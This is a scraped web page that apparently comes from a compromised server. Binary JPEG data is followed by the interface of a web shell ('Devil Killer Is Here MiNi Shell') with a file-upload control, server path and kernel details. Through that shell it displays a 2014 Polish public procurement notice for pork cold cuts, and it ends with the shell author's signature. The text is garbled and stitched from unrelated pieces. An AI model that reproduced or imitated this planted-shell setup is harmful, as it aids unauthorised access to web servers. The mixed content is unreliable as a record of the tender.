JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140529/182334-N-2014.html

<p class="kh_header"><b>Czarne: ZP/66/CZB/2014 Dostawa wędlin wieprzowych do kuchni, sklepu
i kantyny w Czerwonym Borze, kantyn 
w Przytułach Starych i Grądach Woniecko</b><br>
<b>Numer ogłoszenia: 182334 - 2014; data zamieszczenia: 29.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pomorska Instytucja Gospodarki Budżetowej "POMERANIA" , ul. Pomorska 1, 77-330 Czarne, woj. pomorskie, tel. 59 833 36 79, faks 59 833 24 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pigbzamowieniapubliczne.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/66/CZB/2014 Dostawa wędlin wieprzowych do kuchni, sklepu
i kantyny w Czerwonym Borze, kantyn 
w Przytułach Starych i Grądach Woniecko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> L.p.	Asortyment	J.m.	Ilość do	Cena netto	Opis produktu
1.	baleron wp.	kg	50	11,88	Wędzonka wysokowydajna, wędzony, parzony
w składzie mięso wieprzowe min. 70%
2.	baleron wie-przowy plastry pakowany	kg	320	25,80	Wędzonka wysokowydajna, wędzony, parzony
w składzie mięso wieprzowe min. 70% wyrób plasterkowany, paczkowany w opakowanie próżniowe
3.	boczek fasze-rowany	kg	5	14,69	Wędzonka wysokowydajna, wędzony, parzony
w składzie mięso wieprzowe min. 70%
4.	boczek wędzony  plastry pa-kowany	kg	300	25,80	Wędzonka wieprzowa ,wyrób plaster-kowany, paczkowany w opakowanie próżniowe
5.	boczek wędzony ze skórą b/żeberek	kg	300	14,03	Wędzonka wieprzowa , parzona o kształcie naturalnych płatów boczku
6.	golonka parzo-na z przypra-wami	kg	20	18,87	Skład: golonka wieprzowa95%,sól, przyprawy. Gramatura ok. 0,4- 0,5kg. Pakowana próżniowo VAC.
7.	hamburgery	kg	25	1,97	Produkt do bezpośredniego spożycia. Skład :mięso oddzielone mechanicznie z indyka 84%,woda,sól,białko wie-przowe. Pakowane w atmosferze chro-nionej VACUM-250g- 5szt.
8.	kabanosy wie-przowe podsu-szane	kg	100	10,25	Wyrób wieprzowo-drobiowy średnio rozdrobniony, wędzony ,parzony, su-szony. W składzie mięso wieprzowe min. 85%. Pakowany w atmosferze modyfikowanej MAP
9.	kaszanka  gril-lowa	kg	2 500	6,72	Wędlina podrobowa 15-20cm. Skład : woda, mięso wieprzowe 20% kasza gryczana 20%, wątroba wieprzowa 8%, krew wieprzowa
10.	kiełbasa biała parzona	kg	150	10,25	Kiełbasa wieprzowa, średnio rozdrob-niona, parzona, w osłonkach natural-nych
11.	kiełbasa bocz-kowa	kg	200	12,30	Kiełbasa z mięsa wieprzowego, średnio rozdrobniona, parzona, wędzona, w osłonce naturalnej z wieprzowiny o dł. 24-25cm.Powierzcnia produktu lekko pomarszczona.  Pakowana w zmodyfikowanej atmosferze MAP ok. 1,60kg
12.	kiełbasa cytry-nowa	kg	20	11,77	Kiełbasa grubo rozdrobniona, parzona, w osłonce poliamidowej w kształcie batonów o dł. 32-34cm. Produkt w formie luzu.
13.	kiełbasa czosnkowa	kg	250	7,79	Kiełbasa średnio rozdrobniona, barwa wędzenia jasno złota. Pakowana w zmodyfikowanej atmosferze MAP, wyraźny smak czosnku.
14.	kiełbasa fir-mowa podsu-szana	kg	10	9,60	Wyrób wędzony, parzony, podsuszany, średnio rozdrobniony. W składzie zawiera mięso wieprzowe ok. 75%.Pakowana w zmodyfikowanej atmosferze MAP
15.	kiełbasa gril-lowa	kg	25	10,30	Kiełbasa średnio rozdrobniona, parzo-na, peklowana wędzona,w osłonce naturalnej z wieprzowiny.Batony o dł. 11-12cm dwa razy okręcane. Pakowa-na w zmodyfikowanej atmosferze MAP
16.	kiełbasa ka-napkowa wie-przowa	kg	650	10,15	Kiełbasa grubo rozdrobniona, wędzo-na, parzona, w osłonce białkowej, batony dł. 24-26cm, barwa brązowa. Pakowana w zmodyfikowanej atmosferze MAP po 2 szt.
17.	kiełbasa kraja-na 	kg	15	13,19	Kiełbasa wieprzowa, średnio rozdrobniona, wędzona, parzona, w kształcie batonów . Produkt w formie luzu.
18.	kiełbasa kra-kowska parzo-na	kg	250	9,94	Kiełbasa drobiowo-wieprzowa, grubo rozdrobniona peklowana, parzona, wędzona. Skład: mięso drobiowe min. 32%,mięso wieprzowe min.23%, woda, skórki wieprzowe. Pakowana MAP
19.	kiełbasa kra-kowska parzo-na plastry pa-kowana	kg	20	20,00	Kiełbasa drobiowo-wieprzowa, grubo rozdrobniona peklowana, parzona, wędzona. Skład: mięso drobiowe min. 32%,mięso wieprzowe min.23%, woda, skórki wieprzowe. Wyrób plaster-kowany, paczkowany w opakowania próżniowe VAC.
20.	kiełbasa kra-kowska sucha	kg	100	18,35	Wyrób wieprzowy, grubo rozdrobnio-ny, wędzony, parzony, suszony. Kieł-basa w sztucznej osłonce-białkowej w formie batonów. Skład:  mięso wie-przowe min. 78%,sól ,przyprawy natu-ralne.
21.	kiełbasa kra-kowska sucha plastry pako-wana	kg	150	49,60	Wyrób wieprzowy, grubo rozdrobnio-ny, wędzony, parzony, suszony. Kieł-basa w sztucznej osłonce-białkowej w formie batonów. Skład:  mięso wie-przowe min. 78%,sól ,przyprawy natu-ralne. Wyrób plasterkowany , paczko-wany w opakowania próżniowe VAC.
22.	kiełbasa litew-ska	kg	3 900	7,50	Kiełbasa średnio rozdrobniona, barwa wędzenia jasno złota. Pakowana w zmodyfikowanej atmosferze MAP
23.	kiełbasa pal-cówka	kg	200	14,04	Wyrób w cienkim jelicie z mięsa su-rowego, podsuszana, wędzona. Pako-wana w atmosferze chronionej po ok. 2kg
24.	kiełbasa pa-rówkowa wie-przowa	kg	3 500	6,36	Kiełbasa homogenizowana, wędzona, parzona w jelitach wieprzowych o dł. 14cm. Pakowana w zmodyfikowanej atmosferze MAP
25.	kiełbasa pod-wawelska	kg	150	10,01	Kiełbasa średnio rozdrobniona, parzo-na, w osłonce naturalnej z wieprzowi-ny. Skład: mięso wieprzowe min. 77,7%, woda ,sól ,przyprawy. Pako-wana w zmodyfikowanej atmosferze MAP
26.	kiełbasa szyn-kowa	kg	150	11,87	Kiełbasa parzona, grubo rozdrobniona w kształcie batonów o dł. 32-34cm, klipsowane na pętelce, w osłonce biał-kowej lub osłonce faser. Pakowana w zmodyfikowanej atmosferze MAP ok. 2,00kg
27.	kiełbasa śląska	kg	100	12,53	Kiełbasa średnio rozdrobniona, parzo-na, peklowana wędzona, w osłonce naturalnej z wieprzowiny. Batony o dł. 11-12cm dwa razy okręcane. Pakowa-na w zmodyfikowanej atmosferze MAP ok. 0,65kg
28.	kiełbasa toruń-ska	kg	100	9,94	Kiełbasa z mięsa wieprzowego, średnio rozdrobniona, parzona, wędzona, w osłonce naturalnej z wieprzowiny o dł. 24-25cm.Powierzcnia produktu lekko pomarszczona.  Pakowana w zmodyfikowanej atmosferze MAP ok. 1,60kg
29.	kiełbasa zwy-czajna	kg	6 600	6,47	Kiełbasa średnio rozdrobniona, parzo-na, wędzona ,w osłonce naturalnej z wieprzowiny. Skład: mięso wieprzowe min.65%, woda ,skórki wieprzowe, sól, przyprawy. Pakowana w zmodyfi-kowanej atmosferze MAP ok. 2,5kg
30.	kiełbasa ży-wiecka sucha	kg	30	26,67	Kiełbasa suszona, wędzona  grubo rozdrobniona w kształcie batonów o dł. 32-34cm, klipsowane na pętelce ,w osłonce białkowej lub osłonce faser. Pakowana w zmodyfikowanej atmosferze MAP ok. 1,6kg
31.	kiełbasa ży-wiecka sucha plastry pako-wana	kg	5	25,00	Kiełbasa suszona, wędzona  grubo rozdrobniona w kształcie batonów o dł. 32-34cm, klipsowane na pętelce, w osłonce białkowej lub osłonce faser. Wyrób plasterkowany , paczkowany w opakowania próżniowe
32.	Pieczone pi-woszki	kg	20	12,29	Kiełbasa wieprzowa, średnio rozdrob-niona, pieczone, o długości ok.. 8 cm. Pakowane próżniowo VAC.
33.	kindziuk	kg	5	34,55	Wyrób wędzony, parzony, podsuszany, grubo rozdrobniony
34.	luncheon meat	kg	2 500	7,77	Wędlinka średnio rozdrobniona, zawie-rająca mięso wieprzowe z bardzo nie-wielkim dodatkiem mięsa drobiowego. Produkt w kształcie batonów. Produkt w formie luzu.
35.	mielonka tyrolska	kg	2 600	7,77	Wędlina drobno rozdrobniona, charak-terystycznie formowana w osłonce poliamidowej, jasnoróżową barwę w przekroju. Produkt luzem
36.	mielonka wę-dzona	kg	1 500	7,72	Wędlina drobno rozdrobniona, wędzo-na   w kształcie batonów w osłonce poliamidowej, jasnoróżową barwę w przekroju. Produkt luzem
37.	mortadela wie-przowa	kg	3 600	6,79	Wędlina homogenizowana, wędzona, parzona o jasnoróżowym przekroju. Charakteryzuje się aromatem dobranej kompozycji przypraw.  Pakowana w zmodyfikowanej atmosferze MAP
38.	ogonówka wieprzowa	kg	150	13,07	Wędzonka 100% wieprzowa wysoko-wydajna o wadze ok. 400g, pakowana próżniowo
39.	ogonówka wieprzowa plastry pakowana	kg	25	25,80	Wędzonka 100%wieprzowa wysoko-wydajna o wadze ok. 400g. Wyrób plasterkowany , paczkowany w opa-kowania próżniowe VAC.
40.	parówki berlinki 	kg	15	14,02	Wyrób parzony , wędzony, homogeni-zowany, w osłonce poliamidowej . Pakowane próżniowo VAC.
41.	parówki cien-kie wieprzowe	kg	2 300	6,10	Wyrób parzony , wędzony, homogeni-zowany, w osłonce poliamidowej . Pakowane próżniowo VAC.
42.	parówki jedynki	kg	50	3,73	Wyrób parzony , wędzony, homogeni-zowany, w osłonce poliamidowej . Pakowane próżniowo VAC pojedyncze sztuki
43.	pasztet wie-przowy	kg	1 200	8,20	Wyrób wieprzowy, pieczony otrzyma-ny z mięsa wieprzowego z udziałem mięsa drobiowego. Mięso drobno  roz-drobnione. Pieczony w foremkach bez posypki.
44.	pasztetowa we flaku	kg	25	8,72	Wędlina podrobowa, parzona we flaku z mięsa wieprzowego, podrobów i ka-szy manny, batony o dł.25-26cm, bar-wa szaro-kremowa. Konsystencja ła-twa do rozsmarowania, jędrna. Produkt w formie luzu
45.	pasztetowa wieprzowa	kg	2 000	5,76	Wędlina podrobowa, parzona w osłon-ce poliamidowej, batony o dł.25-26cm, barwa szaro-kremowa. Konsystencja łatwa do rozsmarowania, jędrna. Produkt w formie luzu
46.	pieczeń wie-przowa	kg	1 200	10,77	Wyrób wieprzowy, pieczony otrzyma-ny z mięsa wieprzowego. Pieczony w foremkach bez posypki.
47.	polędwica ło-sosiowa 	kg	15	17,27	Kiełbasa średnio rozdrobniona, barwa wędzenia jasno złota. Pakowana w zmodyfikowanej atmosferze MAP, wyraźny smak czosnku.
48.	polędwica so-pocka	kg	300	11,77	Produkt wędzony, parzony o barwie ciemno złotej. Paczkowany w opako-wania próżniowe VAC. Formowany w owalne batony o dł. ok. 30cm
49.	polędwica so-pocka plastry pakowana	kg	350	25,80	Produkt wędzony, parzony o barwie ciemno złotej. Wyrób plasterkowany , paczkowany w opakowania próżniowe VAC.
50.	przysmak śniadaniowy	kg	2 000	7,99	Wyrób blokowy z galaretką średnio rozdrobniony, w osłonce poliamido-wej. Produkt w formie luzu
51.	rolada schabo-wa	kg	10	14,58	Wędzonka grubo rozdrobniona, pe-klowana, wysokowydajna, wędzona, parzona, formowana w owalne batony. Pakowana próżniowo VAC
52.	salami	kg	10	16,20	Wyrób wieprzowy, drobno rozdrob-niony, wędzony, parzony. Skład: mięso wieprzowe 78%, wołowe 18%, tłuszcz wieprzowy, przyprawy. Pakowany próżniowo VAC.
53.	salami plastry pakowana	kg	10	46,50	wyrób wieprzowy, drobno rozdrobnio-ny, wędzony, parzony. Skład: mięso wieprzowe 78%, wołowe 18%, tłuszcz wieprzowy, przyprawy. Wyrób pla-sterkowany , paczkowany w opakowania próżniowe VAC.
54.	salami wegier-skie	kg	5	25,81	Wyrób wieprzowy, drobno rozdrob-niony, wędzony, parzony. Skład: mięso wieprzowe 78%, wołowe 18%, tłuszcz wieprzowy, przyprawy. Pakowany próżniowo VAC.
55.	salceson czarny	kg	1 200	9,74	Produkt  pakowany próżniowo VAC w sztucznej osłonce w kształcie żołądka wieprzowego.
56.	salceson czosnkowy	kg	1 000	6,66	Produkt  pakowany próżniowo VAC w sztucznej osłonce. Wyraźny smak czosnku, w kształcie grubych batonów.
57.	salceson wiej-ski	kg	1 100	7,17	Produkt  pakowany próżniowo VAC w sztucznej osłonce w kształcie żołądka wieprzowego.
58.	schab Bene-dykta	kg	30	16,20	Wyrób parzony, wędzony, przewiąza-ny przędzą wędzarniczą, przekrój o naturalnej barwie. Produkt  pakowany próżniowo VAC
59.	szynka babuni	kg	30	15,01	Wędzonka wieprzowa, wysokowydaj-na, wędzona, parzona, peklowana. Produkt o niewielkiej ilości tłuszczu i barwy ciemno złotej. Pakowana próż-niowo VAC
60.	szynka wędzo-na	kg	40	15,66	Wędzonka wieprzowa, wysokowydaj-na, wędzona, parzona. Produkt barwy ciemno złotej. Pakowana próżniowo VAC
61.	żeberka wę-dzone	kg	15	6,42	Produkt wędzony..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5, 15.13.11.34-3, 15.13.13.10-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie przedłożonego w ofercie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pigbzamowieniapubliczne.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23,18-400 Łomża, tel. (086) 215-35-95 - Sekretariat...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2014 godzina 10:00, miejsce: Pomorska Instytucja Gospodarki Budżetowej POMERANIA z siedzibą w Czarnem ODDZIAŁ W CZERWONYM BORZE, Czerwony Bór 23,18-400 Łomża, tel. (086) 215-35-95 - pok. 6...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com